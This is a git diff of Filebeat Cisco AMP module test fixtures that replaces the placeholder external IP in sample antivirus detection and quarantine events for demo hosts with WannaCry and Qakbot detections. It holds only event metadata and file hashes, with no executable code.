             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5205,7 +5205,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5221,7 +5221,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5261,7 +5261,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 111942,
+        "log.offset": 112387,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5272,7 +5272,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5288,7 +5288,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5328,7 +5328,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 113313,
+        "log.offset": 113763,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5339,7 +5339,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5355,7 +5355,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5395,7 +5395,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 114684,
+        "log.offset": 115139,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5406,7 +5406,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5422,7 +5422,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5462,7 +5462,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 116055,
+        "log.offset": 116515,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5473,7 +5473,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5489,7 +5489,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5529,7 +5529,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 117426,
+        "log.offset": 117891,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5540,7 +5540,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5556,7 +5556,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5596,7 +5596,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 118797,
+        "log.offset": 119267,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5607,7 +5607,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5623,7 +5623,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5663,7 +5663,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 120168,
+        "log.offset": 120643,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5674,7 +5674,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5690,7 +5690,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5730,7 +5730,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 121539,
+        "log.offset": 122019,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5741,7 +5741,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5757,7 +5757,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5797,7 +5797,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 122910,
+        "log.offset": 123395,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -5808,7 +5808,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -5824,7 +5824,7 @@
         "@timestamp": "2021-01-14T17:39:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -5863,7 +5863,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 124281,
+        "log.offset": 124771,
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
         "process.name": "mssecsvc.exe",
         "process.pid": 6404,
@@ -5875,7 +5875,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log
index dc134052124e..ecfcf6be070a 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log
@@ -1,62 +1,62 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
